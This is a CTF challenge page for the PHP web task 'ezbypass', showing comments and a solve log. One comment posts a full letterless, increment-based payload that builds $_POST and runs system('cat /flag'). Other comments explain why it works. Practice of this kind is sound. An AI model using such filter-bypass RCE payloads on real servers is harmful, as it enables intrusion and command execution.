ezbypassWEB 未解决

分数: 25 金币: 4
题目作者: XHH1H
一  血: volcano
一血奖励: 5金币
解  决: 659
提  示:
描  述:
flag{}
评论
鲲中霸王 4月前

code=$_=(_/_._)[_];$__=%2B%2B$_;%2B%2B$_;$__=_.$_.$__;%2B%2B$_;%2B%2B$_;$__.=%2B%2B$_;$__.=%2B%2B$_;$$__[_]($$__[__]);&_= system&__=cat /flag

回复 1

lzhh530393027 5月前

看懂解析了,但是再做一次也不会

回复 0

jiubanyipeng 11月前

脚本参考:https://www.jiubanyipeng.com/1851.html

回复 2

Jiafeng 1年前

我去,属于知道思路,但是不敢实践的题目;(无数子字母RCE)

回复 0

小丁小丁少发神经 1年前

求问为啥设计成system和cat /flag用两个参数传,为什么不可以构造出$_POST[_]然后赋值_=system(cat /flag)呢(验证一下确实不行,但是不懂为啥)

回复 0
shingu 1年前

我也有个疑问。我花了好几个小时去研究,但也是一知半解。目前得到的答案是:`$$_[_]` 等价于 `${$_POST['_']}`,即用 `$_POST['_']` 的值作为变量名。如果使用`_=system(cat /flag)`,PHP会尝试访问名为 `$system('cat /flag')` 的变量,这显然非法,所以行不通。

回复 0

不会写代码的菜鸟 1年前

这道题完全不是我能做的,有答案也看不懂

回复 1

modeng 1年前

以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501

回复 5
Jiafeng 1年前

牛逼,可以直接造出N字符,那就好搞了;

回复 0

hutiaan 2年前

难,为了难而难

回复 1

不懂就问 2年前

参考:https://blog.csdn.net/qq_36292543/article/details/136623586

回复 2

不会编程的崽 2年前

自增绕过,最后的payload可以在burp里进行对特殊字符的url编码

回复 0

WriteUp

image
Jesen

2 金币

评分(4)

解题动态

FlyXz 攻破了该题 4天前
提姆邓肯 攻破了该题 5天前
Kernel1 攻破了该题 5天前
avaclaire 攻破了该题 5天前
wujita01 攻破了该题 6天前
hsk_zy 攻破了该题 6天前
Posin 攻破了该题 8天前
YS_JW 攻破了该题 9天前
mean 攻破了该题 11天前
nanaqilin 攻破了该题 15天前
kr2yh 攻破了该题 16天前
S-killer 攻破了该题 16天前
Lee003 攻破了该题 16天前
lanza2451150 攻破了该题 18天前
yuesheng#1 攻破了该题 18天前
嘻嘻嘻vvvv 攻破了该题 18天前
Yvvv1y 攻破了该题 20天前
pigggg 攻破了该题 20天前
FTJJJ 攻破了该题 21天前
654620946 攻破了该题 22天前
问题反馈